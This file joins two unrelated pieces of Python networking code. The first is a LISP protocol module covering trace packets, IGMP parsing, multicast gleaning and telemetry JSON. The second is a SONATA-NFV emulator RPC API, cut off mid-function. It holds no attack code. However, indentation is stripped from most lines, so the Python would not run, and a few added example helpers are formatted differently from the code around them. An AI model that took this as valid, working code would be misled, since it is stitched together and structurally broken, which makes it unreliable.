def lisp_get_decent_index(eid):
eid_str = eid.print_prefix()
hash_value = hashlib.sha256(eid_str).hexdigest()
index = int(hash_value, 16) % lisp_decent_modulus
return(index)
#enddef
#
# lisp_get_decent_dns_name
#
# Based on EID, get index and prepend to LISP-Decent DNS name suffix.
#
def lisp_get_decent_dns_name(eid):
index = lisp_get_decent_index(eid)
return(str(index) + "." + lisp_decent_dns_suffix)
#enddef
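#
# Illustrative example (modulus and suffix are assumed values, not real
# configuration): with lisp_decent_modulus = 16 and lisp_decent_dns_suffix =
# "map.example.com", an EID whose sha256 hash mod 16 is 7 maps to DNS name
# "7.map.example.com".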
#
# lisp_get_decent_dns_name_from_str
#
# The supplied EID is passed as a string. Build an internal lisp_address()
# to pass into lisp_get_decent_index().
#
def lisp_get_decent_dns_name_from_str(iid, eid_str):
eid = lisp_address(LISP_AFI_NONE, eid_str, 0, iid)
index = lisp_get_decent_index(eid)
return(str(index) + "." + lisp_decent_dns_suffix)
#enddef
#
# lisp_trace_append
#
# Append JSON data to trace packet. If this is the ETR, the EIDs will be
# swapped to return packet to originator.
#
# Returning False means the caller should return (and not forward the packet).
#
def lisp_trace_append(packet, reason=None, ed="encap", lisp_socket=None,
rloc_entry=None):
offset = 28 if packet.inner_version == 4 else 48
trace_pkt = packet.packet[offset::]
trace = lisp_trace()
if (trace.decode(trace_pkt) == False):
lprint("Could not decode JSON portion of a LISP-Trace packet")
return(False)
#endif
next_rloc = "?" if packet.outer_dest.is_null() else \
packet.outer_dest.print_address_no_iid()
#
    # Display port if the caller is an encapsulating RTR using a translated
    # RLOC.
#
if (next_rloc != "?" and packet.encap_port != LISP_DATA_PORT):
if (ed == "encap"): next_rloc += ":{}".format(packet.encap_port)
#endif
#
# Add node entry data for the encapsulation or decapsulation.
#
entry = {}
entry["node"] = "ITR" if lisp_i_am_itr else "ETR" if lisp_i_am_etr else \
"RTR" if lisp_i_am_rtr else "?"
srloc = packet.outer_source
if (srloc.is_null()): srloc = lisp_myrlocs[0]
entry["srloc"] = srloc.print_address_no_iid()
#
# In the source RLOC include the ephemeral port number of the ltr client
# so RTRs can return errors to the client behind a NAT.
#
if (entry["node"] == "ITR" and packet.inner_sport != LISP_TRACE_PORT):
entry["srloc"] += ":{}".format(packet.inner_sport)
#endif
entry["hn"] = lisp_hostname
key = ed + "-ts"
entry[key] = lisp_get_timestamp()
#
    # If this is an ETR decap entry and the drloc is "?", the packet came in on
# lisp_etr_nat_data_plane() where the kernel strips the outer header. Get
# the local/private RLOC from our database-mapping.
#
if (next_rloc == "?" and entry["node"] == "ETR"):
db = lisp_db_for_lookups.lookup_cache(packet.inner_dest, False)
if (db != None and len(db.rloc_set) >= 1):
next_rloc = db.rloc_set[0].rloc.print_address_no_iid()
#endif
#endif
entry["drloc"] = next_rloc
#
# If there is a reason there is no dest RLOC, include it.
#
if (next_rloc == "?" and reason != None):
entry["drloc"] += " ({})".format(reason)
#endif
#
# Add recent-rtts, recent-hops, and recent-latencies.
#
if (rloc_entry != None):
entry["rtts"] = rloc_entry.recent_rloc_probe_rtts
entry["hops"] = rloc_entry.recent_rloc_probe_hops
entry["latencies"] = rloc_entry.recent_rloc_probe_latencies
#endif
#
# Build seid->deid record if it does not exist. Then append node entry
# to record below, in the search loop.
#
seid = packet.inner_source.print_address()
deid = packet.inner_dest.print_address()
if (trace.packet_json == []):
rec = {}
rec["seid"] = seid
rec["deid"] = deid
rec["paths"] = []
trace.packet_json.append(rec)
#endif
#
    # Search for record. If we are appending the first ITR node entry, get its
# RLOC address in case we have to return-to-sender.
#
for rec in trace.packet_json:
if (rec["deid"] != deid): continue
rec["paths"].append(entry)
break
#endfor
#
    # If we are the destination EID, add a new record deid->seid if we have not
# completed a round-trip. The ETR will deliver this packet from its own
# EID which means the co-located ITR will pcap the packet and add its
# encap node entry.
#
swap = False
if (len(trace.packet_json) == 1 and entry["node"] == "ETR" and
trace.myeid(packet.inner_dest)):
rec = {}
rec["seid"] = deid
rec["deid"] = seid
rec["paths"] = []
trace.packet_json.append(rec)
swap = True
#endif
#
# Print the JSON packet after we appended data to it. Put the new JSON in
# packet. Fix up lengths and checksums from inner headers.
#
trace.print_trace()
trace_pkt = trace.encode()
#
# If next_rloc is not known, we need to return packet to sender.
#
    # Otherwise we are forwarding a packet that is about to be encapsulated or we
# are forwarding a packet that was just decapsulated with the addresses
# swapped so we can turn it around.
#
sender_rloc = trace.packet_json[0]["paths"][0]["srloc"]
if (next_rloc == "?"):
lprint("LISP-Trace return to sender RLOC {}".format(sender_rloc))
trace.return_to_sender(lisp_socket, sender_rloc, trace_pkt)
return(False)
#endif
#
# Compute length of trace packet. This includes the UDP header, Trace
# header, and JSON payload.
#
udplen = trace.packet_length()
#
# Fix up UDP length and recompute UDP checksum if IPv6 packet, zero
# otherwise. Only do checksum when the Trace went round-trip and this is
# the local ETR delivery EID-based Trace packet to the client ltr.
#
headers = packet.packet[0:offset]
p = struct.pack("HH", socket.htons(udplen), 0)
headers = headers[0:offset-4] + p
if (packet.inner_version == 6 and entry["node"] == "ETR" and
len(trace.packet_json) == 2):
udp = headers[offset-8::] + trace_pkt
udp = lisp_udp_checksum(seid, deid, udp)
headers = headers[0:offset-8] + udp[0:8]
#endif
#
    # If we are swapping addresses, do it here so the JSON append and IP
    # header field changes are all reflected in the new IPv4 header checksum.
#
if (swap):
if (packet.inner_version == 4):
headers = headers[0:12] + headers[16:20] + headers[12:16] + \
headers[22:24] + headers[20:22] + headers[24::]
else:
headers = headers[0:8] + headers[24:40] + headers[8:24] + \
headers[42:44] + headers[40:42] + headers[44::]
#endif
d = packet.inner_dest
packet.inner_dest = packet.inner_source
packet.inner_source = d
#endif
#
# Fix up IP length.
#
offset = 2 if packet.inner_version == 4 else 4
iplen = 20 + udplen if packet.inner_version == 4 else udplen
h = struct.pack("H", socket.htons(iplen))
headers = headers[0:offset] + h + headers[offset+2::]
#
# Fix up IPv4 header checksum.
#
if (packet.inner_version == 4):
c = struct.pack("H", 0)
headers = headers[0:10] + c + headers[12::]
h = lisp_ip_checksum(headers[0:20])
headers = h + headers[20::]
#endif
#
# Caller is forwarding packet, either as an ITR, RTR, or ETR.
#
packet.packet = headers + trace_pkt
return(True)
#enddef
#
# lisp_allow_gleaning
#
# Check the lisp_glean_mappings array to see if we should glean the EID and
# RLOC. Find first match. Return False if there are no configured glean
# mappings. The second and third return values indicate whether the matched
# entry was configured to RLOC-probe the gleaned RLOC and whether to send
# IGMP queries for it.
#
def lisp_allow_gleaning(eid, group, rloc):
if (lisp_glean_mappings == []): return(False, False, False)
for entry in lisp_glean_mappings:
if (entry.has_key("instance-id")):
iid = eid.instance_id
low, high = entry["instance-id"]
if (iid < low or iid > high): continue
#endif
if (entry.has_key("eid-prefix")):
e = copy.deepcopy(entry["eid-prefix"])
e.instance_id = eid.instance_id
if (eid.is_more_specific(e) == False): continue
#endif
if (entry.has_key("group-prefix")):
if (group == None): continue
g = copy.deepcopy(entry["group-prefix"])
g.instance_id = group.instance_id
if (group.is_more_specific(g) == False): continue
#endif
if (entry.has_key("rloc-prefix")):
if (rloc != None and rloc.is_more_specific(entry["rloc-prefix"])
== False): continue
#endif
return(True, entry["rloc-probe"], entry["igmp-query"])
#endfor
return(False, False, False)
#enddef
#
# lisp_build_gleaned_multicast
#
# Build (*,G) map-cache entry in RTR with gleaned RLOC info from IGMP report.
#
def lisp_build_gleaned_multicast(seid, geid, rloc, port, igmp):
group_str = geid.print_address()
seid_name = seid.print_address_no_iid()
s = green("{}".format(seid_name), False)
e = green("(*, {})".format(group_str), False)
r = red(rloc.print_address_no_iid() + ":" + str(port), False)
#
# Support (*,G) only gleaning. Scales better anyway.
#
mc = lisp_map_cache_lookup(seid, geid)
if (mc == None):
mc = lisp_mapping("", "", [])
mc.group.copy_address(geid)
mc.eid.copy_address(geid)
mc.eid.address = 0
mc.eid.mask_len = 0
mc.mapping_source.copy_address(rloc)
mc.map_cache_ttl = LISP_IGMP_TTL
mc.gleaned = True
mc.add_cache()
lprint("Add gleaned EID {} to map-cache".format(e))
#endif
#
# Check to see if RLE node exists. If so, update the RLE node RLOC and
# encap-port.
#
rloc_entry = rle_entry = rle_node = None
if (mc.rloc_set != []):
rloc_entry = mc.rloc_set[0]
if (rloc_entry.rle):
rle_entry = rloc_entry.rle
for rn in rle_entry.rle_nodes:
if (rn.rloc_name != seid_name): continue
rle_node = rn
break
#endfor
#endif
#endif
#
# Adding RLE to existing rloc-set or create new one.
#
if (rloc_entry == None):
rloc_entry = lisp_rloc()
mc.rloc_set = [rloc_entry]
rloc_entry.priority = 253
rloc_entry.mpriority = 255
mc.build_best_rloc_set()
#endif
if (rle_entry == None):
rle_entry = lisp_rle(geid.print_address())
rloc_entry.rle = rle_entry
#endif
if (rle_node == None):
rle_node = lisp_rle_node()
rle_node.rloc_name = seid_name
rle_entry.rle_nodes.append(rle_node)
rle_entry.build_forwarding_list()
lprint("Add RLE {} from {} for gleaned EID {}".format(r, s, e))
elif (rloc.is_exact_match(rle_node.address) == False or
port != rle_node.translated_port):
lprint("Changed RLE {} from {} for gleaned EID {}".format(r, s, e))
#endif
#
# Add or update.
#
rle_node.store_translated_rloc(rloc, port)
#
# An IGMP report was received. Update timestamp so we don't time out
# actively joined groups.
#
if (igmp):
seid_str = seid.print_address()
if (lisp_gleaned_groups.has_key(seid_str) == False):
lisp_gleaned_groups[seid_str] = {}
#endif
lisp_gleaned_groups[seid_str][group_str] = lisp_get_timestamp()
#endif
#enddef
#
# lisp_remove_gleaned_multicast
#
# Remove an RLE from a gleaned entry since an IGMP Leave message was received.
#
def lisp_remove_gleaned_multicast(seid, geid):
#
# Support (*,G) only gleaning. Scales better anyway.
#
mc = lisp_map_cache_lookup(seid, geid)
if (mc == None): return
rle = mc.rloc_set[0].rle
if (rle == None): return
rloc_name = seid.print_address_no_iid()
found = False
for rle_node in rle.rle_nodes:
if (rle_node.rloc_name == rloc_name):
found = True
break
#endif
#endfor
if (found == False): return
#
# Found entry to remove.
#
rle.rle_nodes.remove(rle_node)
rle.build_forwarding_list()
group_str = geid.print_address()
seid_str = seid.print_address()
s = green("{}".format(seid_str), False)
e = green("(*, {})".format(group_str), False)
lprint("Gleaned EID {} RLE removed for {}".format(e, s))
#
# Remove that EID has joined the group.
#
if (lisp_gleaned_groups.has_key(seid_str)):
if (lisp_gleaned_groups[seid_str].has_key(group_str)):
lisp_gleaned_groups[seid_str].pop(group_str)
#endif
#endif
#
# Remove map-cache entry if no more RLEs present.
#
if (rle.rle_nodes == []):
mc.delete_cache()
lprint("Gleaned EID {} remove, no more RLEs".format(e))
#endif
#enddef
#
# lisp_change_gleaned_multicast
#
# Change RLOC for each gleaned group this EID has joined.
#
def lisp_change_gleaned_multicast(seid, rloc, port):
seid_str = seid.print_address()
if (lisp_gleaned_groups.has_key(seid_str) == False): return
for group in lisp_gleaned_groups[seid_str]:
lisp_geid.store_address(group)
lisp_build_gleaned_multicast(seid, lisp_geid, rloc, port, False)
#endfor
#enddef
#
# lisp_process_igmp_packet
#
# Process IGMP packets.
#
# Basically odd types are Joins and even types are Leaves.
#
#
# An IGMPv1 and IGMPv2 report format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Version| Type | Unused | Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Group Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# An IGMPv3 report format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 0x22 | Reserved | Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | Number of Group Records (M) |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Group Record [1] .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Group Record [2] .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . |
# . . .
# | . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Group Record [M] .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# An IGMPv3 group record format is:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record Type | Aux Data Len | Number of Sources (N) |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Multicast Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Source Address [1] |
# +- -+
# | Source Address [2] |
# +- -+
# . . .
# . . .
# . . .
# +- -+
# | Source Address [N] |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Auxiliary Data .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
#
# The function returns a boolean (True) when the packet is an IGMP query and
# an array when it is a report. The caller must check whether there is
# context to deal with IGMP queries.
#
# IMPORTANT NOTE: for encapsulated IGMP Queries to be forwarded correctly
# after the ETR decapsulates them, you need this in the kernel (put this
# statement in the RL script):
#
# ip route add 224.0.0.1/32 dev lo
#
# For OOR running as a LISP-MN use:
#
# ip route add 224.0.0.1/32 dev utun4
#
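#
# Illustrative sketch (not part of the original lispers.net code): how the
# 8-byte IGMPv1/IGMPv2 report layout documented above maps onto struct
# packing. The function name and the default group address are example
# values only. The checksum is the usual one's complement sum of the four
# 16-bit words with the checksum field zeroed.
#
def lisp_example_build_igmpv2_report(group="239.1.2.3"):
    hdr = struct.pack("!BBH4s", 0x16, 0, 0, socket.inet_aton(group))
    csum = sum(struct.unpack("!4H", hdr))
    while (csum >> 16): csum = (csum & 0xffff) + (csum >> 16)
    csum = ~csum & 0xffff
    return(struct.pack("!BBH4s", 0x16, 0, csum, socket.inet_aton(group)))
#enddef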
igmp_types = { 17 : "IGMP-query", 18 : "IGMPv1-report", 19 : "DVMRP",
20 : "PIMv1", 22 : "IGMPv2-report", 23 : "IGMPv2-leave",
30 : "mtrace-response", 31 : "mtrace-request", 34 : "IGMPv3-report" }
lisp_igmp_record_types = { 1 : "include-mode", 2 : "exclude-mode",
3 : "change-to-include", 4 : "change-to-exclude", 5 : "allow-new-source",
6 : "block-old-sources" }
def lisp_process_igmp_packet(packet):
source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
source.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
source = bold("from {}".format(source.print_address_no_iid()), False)
r = bold("Receive", False)
lprint("{} {}-byte {}, IGMP packet: {}".format(r, len(packet), source,
lisp_format_packet(packet)))
#
# Jump over IP header.
#
header_offset = (struct.unpack("B", packet[0])[0] & 0x0f) * 4
#
# Check for IGMPv3 type value 0x22. Or process an IGMPv2 report.
#
igmp = packet[header_offset::]
#
# Make sure the fixed 8-byte header is present before parsing the type and
# group address fields.
#
if (len(igmp) < 8):
lprint("IGMP message too small")
return([])
#endif
igmp_type = struct.unpack("B", igmp[0])[0]
#
# Maybe this is an IGMPv1 or IGMPv2 message so get group address. If
# IGMPv3, we will fix up group address in loop (for each group record).
#
group = lisp_address(LISP_AFI_IPV4, "", 32, 0)
group.address = socket.ntohl(struct.unpack("II", igmp[:8])[1])
group_str = group.print_address_no_iid()
if (igmp_type == 17):
lprint("IGMP Query for group {}".format(group_str))
return(True)
#endif
reports_and_leaves_only = (igmp_type in (0x12, 0x16, 0x17, 0x22))
if (reports_and_leaves_only == False):
igmp_str = "{} ({})".format(igmp_type, igmp_types[igmp_type]) if \
igmp_types.has_key(igmp_type) else igmp_type
lprint("IGMP type {} not supported".format(igmp_str))
return([])
#endif
#
# Process either IGMPv1 or IGMPv2 and exit.
#
if (igmp_type == 0x17):
lprint("IGMPv2 leave (*, {})".format(bold(group_str, False)))
return([[None, group_str, False]])
#endif
if (igmp_type in (0x12, 0x16)):
lprint("IGMPv{} join (*, {})".format( \
1 if (igmp_type == 0x12) else 2, bold(group_str, False)))
#
# Suppress for link-local groups.
#
if (group_str.find("224.0.0.") != -1):
lprint("Suppress registration for link-local groups")
else:
return([[None, group_str, True]])
#endif
#
# Finished with IGMPv1 or IGMPv2 processing.
#
return([])
#endif
#
# Parse each record for IGMPv3 (igmp_type == 0x22).
#
record_count = group.address
igmp = igmp[8::]
group_format = "BBHI"
group_size = struct.calcsize(group_format)
source_format = "I"
source_size = struct.calcsize(source_format)
source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
#
# Traverse each group record.
#
register_entries = []
for i in range(record_count):
if (len(igmp) < group_size): return(register_entries)
record_type, x, source_count, address = struct.unpack(group_format,
igmp[:group_size])
igmp = igmp[group_size::]
if (lisp_igmp_record_types.has_key(record_type) == False):
lprint("Invalid record type {}".format(record_type))
continue
#endif
record_type_str = lisp_igmp_record_types[record_type]
source_count = socket.ntohs(source_count)
group.address = socket.ntohl(address)
group_str = group.print_address_no_iid()
lprint("Record type: {}, group: {}, source-count: {}".format( \
record_type_str, group_str, source_count))
#
# Determine if this is a join or leave. MODE_IS_INCLUDE (1) is a join.
# MODE_TO_EXCLUDE (4) with no sources is a join. CHANGE_TO_INCLUDE (5)
# is a join. Everything else is a leave.
#
joinleave = False
if (record_type in (1, 5)): joinleave = True
if (record_type in (2, 4) and source_count == 0): joinleave = True
j_or_l = "join" if (joinleave) else "leave"
#
# Suppress registration for link-local groups.
#
if (group_str.find("224.0.0.") != -1):
lprint("Suppress registration for link-local groups")
continue
#endif
#
# (*,G) Join or Leave has been received if source count is 0.
#
# If this is IGMPv2 or just IGMPv3 reporting a group address, encode
# a (*,G) for the element in the register_entries array.
#
if (source_count == 0):
register_entries.append([None, group_str, joinleave])
lprint("IGMPv3 {} (*, {})".format(bold(j_or_l, False),
bold(group_str, False)))
#endif
#
# Process (S,G)s (source records)..
#
for j in range(source_count):
if (len(igmp) < source_size): return(register_entries)
address = struct.unpack(source_format, igmp[:source_size])[0]
source.address = socket.ntohl(address)
source_str = source.print_address_no_iid()
register_entries.append([source_str, group_str, joinleave])
lprint("{} ({}, {})".format(j_or_l,
green(source_str, False), bold(group_str, False)))
igmp = igmp[source_size::]
#endfor
#endfor
#
# Return the (S,G) entries to the caller so it can send a Map-Register.
# They are put in a Multicast Info LCAF Type with ourselves as an RLE.
# This is specified in RFC 8378.
#
return(register_entries)
#enddef
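#
# Illustrative helper (not part of the original lispers.net code): shows the
# shape of the array lisp_process_igmp_packet() returns. Each element is a
# [source, group, joinleave] triple where source is None for (*,G) entries,
# for example [[None, "239.1.1.1", True], ["10.0.0.5", "232.1.1.1", False]].
# The addresses are example values only.
#
def lisp_example_walk_igmp_entries(entries):
    for source, group, joinleave in entries:
        action = "join" if (joinleave) else "leave"
        lprint("{} ({}, {})".format(action,
            "*" if (source == None) else source, group))
    #endfor
#enddef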
#
# lisp_glean_map_cache
#
# Add or update a gleaned EID/RLOC to the map-cache. This function will do
# this for the source EID of a packet and IGMP reported groups with one call.
#
lisp_geid = lisp_address(LISP_AFI_IPV4, "", 32, 0)
def lisp_glean_map_cache(seid, rloc, encap_port, igmp):
#
# First do lookup to see if EID is in map-cache. Check to see if RLOC
# or encap-port needs updating. If not, return. Set refresh timer since
# we received a packet from the source gleaned EID.
#
rloc_change = True
mc = lisp_map_cache.lookup_cache(seid, True)
if (mc and len(mc.rloc_set) != 0):
mc.last_refresh_time = lisp_get_timestamp()
cached_rloc = mc.rloc_set[0]
orloc = cached_rloc.rloc
oport = cached_rloc.translated_port
rloc_change = (orloc.is_exact_match(rloc) == False or
oport != encap_port)
if (rloc_change):
e = green(seid.print_address(), False)
r = red(rloc.print_address_no_iid() + ":" + str(encap_port), False)
lprint("Change gleaned EID {} to RLOC {}".format(e, r))
cached_rloc.delete_from_rloc_probe_list(mc.eid, mc.group)
lisp_change_gleaned_multicast(seid, rloc, encap_port)
#endif
else:
mc = lisp_mapping("", "", [])
mc.eid.copy_address(seid)
mc.mapping_source.copy_address(rloc)
mc.map_cache_ttl = LISP_GLEAN_TTL
mc.gleaned = True
e = green(seid.print_address(), False)
r = red(rloc.print_address_no_iid() + ":" + str(encap_port), False)
lprint("Add gleaned EID {} to map-cache with RLOC {}".format(e, r))
mc.add_cache()
#endif
#
# Add RLOC to a new map-cache entry or update RLOC for an existing entry.
#
if (rloc_change):
rloc_entry = lisp_rloc()
rloc_entry.store_translated_rloc(rloc, encap_port)
rloc_entry.add_to_rloc_probe_list(mc.eid, mc.group)
rloc_entry.priority = 253
rloc_entry.mpriority = 255
rloc_set = [rloc_entry]
mc.rloc_set = rloc_set
mc.build_best_rloc_set()
#endif
#
# Unicast gleaning only.
#
if (igmp == None): return
#
# Process IGMP report. For each group, put in map-cache with gleaned
# source RLOC and source port.
#
lisp_geid.instance_id = seid.instance_id
#
# Add (S,G) or (*,G) to map-cache. Do not do lookup in group-mappings.
# The lisp-etr process will do this.
#
entries = lisp_process_igmp_packet(igmp)
if (type(entries) == bool): return
for source, group, joinleave in entries:
if (source != None): continue
#
# Does policy allow gleaning for this joined multicast group?
#
lisp_geid.store_address(group)
allow, x, y = lisp_allow_gleaning(seid, lisp_geid, rloc)
if (allow == False): continue
if (joinleave):
lisp_build_gleaned_multicast(seid, lisp_geid, rloc, encap_port,
True)
else:
lisp_remove_gleaned_multicast(seid, lisp_geid)
#endif
#endfor
#enddef
#
# lisp_is_json_telemetry
#
# Return a dictionary array if the json string has the following two key/value
# pairs in it. Otherwise, return None.
#
# { "type" : "telemetry", "sub-type" : "timestamps" }
#
def lisp_is_json_telemetry(json_string):
try:
tel = json.loads(json_string)
if (type(tel) != dict): return(None)
except:
lprint("Could not decode telemetry json: {}".format(json_string))
return(None)
#endtry
if (tel.has_key("type") == False): return(None)
if (tel.has_key("sub-type") == False): return(None)
if (tel["type"] != "telemetry"): return(None)
if (tel["sub-type"] != "timestamps"): return(None)
return(tel)
#enddef
#
# lisp_encode_telemetry
#
# Take json string:
#
# { "type" : "telemetry", "sub-type" : "timestamps", "itr-out" : "?",
# "etr-in" : "?", "etr-out" : "?", "itr-in" : "?" }
#
# And fill in timestamps for the 4 fields. Input to this function is a string.
#
def lisp_encode_telemetry(json_string, ii="?", io="?", ei="?", eo="?"):
tel = lisp_is_json_telemetry(json_string)
if (tel == None): return(json_string)
if (tel["itr-in"] == "?"): tel["itr-in"] = ii
if (tel["itr-out"] == "?"): tel["itr-out"] = io
if (tel["etr-in"] == "?"): tel["etr-in"] = ei
if (tel["etr-out"] == "?"): tel["etr-out"] = eo
json_string = json.dumps(tel)
return(json_string)
#enddef
#
# lisp_decode_telemetry
#
# Take json string:
#
# { "type" : "telemetry", "sub-type" : "timestamps", "itr-out" : "?",
# "etr-in" : "?", "etr-out" : "?", "itr-in" : "?" }
#
# And return values in a dictionary array. Input to this function is a string.
#
def lisp_decode_telemetry(json_string):
tel = lisp_is_json_telemetry(json_string)
if (tel == None): return({})
return(tel)
#enddef
#
# lisp_telemetry_configured
#
# Return JSON string template of telemetry data if it has been configured.
# If it has been configured we'll find a "lisp json" command with json-name
# "telemetry". If found, return the json string. Otherwise, return None.
#
def lisp_telemetry_configured():
if (lisp_json_list.has_key("telemetry") == False): return(None)
json_string = lisp_json_list["telemetry"].json_string
if (lisp_is_json_telemetry(json_string) == None): return(None)
return(json_string)
#enddef
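#
# Illustrative sketch (not part of the original lispers.net code): the
# telemetry JSON template documented above, filled in with the standard json
# module the same way lisp_encode_telemetry() stamps the four fields. The
# function name and the timestamp argument are example values only.
#
def lisp_example_fill_telemetry(json_string, now):
    tel = json.loads(json_string)
    for key in ("itr-out", "etr-in", "etr-out", "itr-in"):
        if (tel.get(key) == "?"): tel[key] = now
    #endfor
    return(json.dumps(tel))
#enddef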
#------------------------------------------------------------------------------
|
network.py
|
"""
Copyright (c) 2015 SONATA-NFV
ALL RIGHTS RESERVED.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Neither the name of the SONATA-NFV [, ANY ADDITIONAL AFFILIATION]
nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written
permission.
This work has been performed in the framework of the SONATA project,
funded by the European Commission under Grant number 671517 through
the Horizon 2020 and 5G-PPP programmes. The authors would like to
acknowledge the contributions of their colleagues of the SONATA
partner consortium (www.sonata-nfv.eu).
"""
"""
Distributed Cloud Emulator (dcemulator)
Networking and monitoring functions
(c) 2015 by Steven Van Rossem <steven.vanrossem@intec.ugent.be>
"""
import logging
import threading
import zerorpc
logging.basicConfig(level=logging.INFO)
class ZeroRpcApiEndpointDCNetwork(object):
"""
Simple API endpoint that offers a zerorpc-based
interface. This interface will be used by the
default command line client.
It can be used as a reference to implement
REST interfaces providing the same semantics,
like e.g. OpenStack compute API.
"""
def __init__(self, listenip, port, DCNetwork=None):
self.ip = listenip
self.port = port
if DCNetwork:
self.connectDCNetwork(DCNetwork)
logging.debug("Created monitoring API endpoint %s(%s:%d)" % (
self.__class__.__name__, self.ip, self.port))
def connectDCNetwork(self, net):
self.net = net
logging.info("Connected DCNetwork to API endpoint %s(%s:%d)" % (
self.__class__.__name__, self.ip, self.port))
def start(self):
thread = threading.Thread(target=self._api_server_thread, args=())
thread.daemon = True
thread.start()
logging.debug("Started API endpoint %s(%s:%d)" % (
self.__class__.__name__, self.ip, self.port))
def _api_server_thread(self):
s = zerorpc.Server(DCNetworkApi(self.net))
s.bind("tcp://%s:%d" % (self.ip, self.port))
s.run()
def stop(self):
logging.info("Stop the monitoring API endpoint")
return
class DCNetworkApi(object):
"""
The networking and monitoring commands need the scope of the
whole DC network to find the requested vnf. So this API is intended
to work with a DCNetwork.
Just pass through the corresponding request to the
selected data center network. Do not implement provisioning
logic here because we will have multiple API
endpoint implementations in the end.
"""
def __init__(self, net):
self.net = net
def network_action_start(self, vnf_src_name, vnf_dst_name, kwargs):
# call DCNetwork method, not really datacenter specific API for now...
# provided dc name needs to be part of API endpoint
# no check if vnfs are really connected to this datacenter...
logging.debug("RPC CALL: network chain start")
try:
c = self.net.setChain(
vnf_src_name, vnf_dst_name,
vnf_src_interface=kwargs.get('vnf_src_interface'),
vnf_dst_interface=kwargs.get('vnf_dst_interface'),
cmd='add-flow',
weight=kwargs.get('weight'),
match=kwargs.get('match'),
bidirectional=kwargs.get('bidirectional'),
cookie=kwargs.get('cookie'))
return str(c)
except Exception as ex:
logging.exception("RPC error.")
return ex.message
def network_action_stop(self, vnf_src_name, vnf_dst_name, kwargs):
# call DCNetwork method, not really datacenter specific API for now...
# provided dc name needs to be part of API endpoint
# no check if vnfs are really connected to this datacenter...
logging.debug("RPC CALL: network chain stop")
try:
c = self.net.setChain(
vnf_src_name, vnf_dst_name,
vnf_src_interface=kwargs.get('vnf_src_interface'),
vnf_dst_interface=kwargs.get('vnf_dst_interface'),
cmd='del-flows',
weight=kwargs.get('weight'),
match=kwargs.get('match'),
bidirectional=kwargs.get('bidirectional'),
cookie=kwargs.get('cookie'))
return c
except Exception as ex:
logging.exception("RPC error.")
return ex.message
# setup the rate measurement for a vnf interface
def setup_metric(self, vnf_name, vnf_interface, metric):
logging.debug("RPC CALL: setup metric")
try:
c = self.net.monitor_agent.setup_metric(vnf_name, vnf_interface, metric)
return c
except Exception as ex:
logging.exception("RPC error.")
return ex.message
# remove the rate measurement for a vnf interface
def stop_metric(self, vnf_name, vnf_interface, metric):
logging.debug("RPC CALL: stop metric")
try:
c = self.net.monitor_agent.stop_metric(vnf_name, vnf_interface, metric)
return c
except Exception as ex:
logging.exception("RPC error.")
return ex.message
# setup the flow metrics measurement
def setup_flow(self, vnf_name, vnf_interface, metric, cookie):
logging.debug("RPC CALL: setup flow")
try:
c = self.net.monitor_agent.setup_flow(vnf_name, vnf_interface, metric, cookie)
return c
except Exception as ex:
logging.exception("RPC error.")
return ex.message
# remove the flow metrics measurement
def stop_flow(self, vnf_name, vnf_interface, metric, cookie):
logging.debug("RPC CALL: stop flow")
try:
c = self.net.monitor_agent.stop_flow(vnf_name, vnf_interface, metric, cookie)
return c
except Exception as ex:
logging.exception("RPC error.")
return ex.message
# do prometheus query
def prometheus(self, dc_label, vnf_name, vnf_interface, query):
logging.debug("RPC CALL: query prometheus")
vnf_status = self.net.dcs.get(dc_label).containers.get(vnf_name).getStatus()
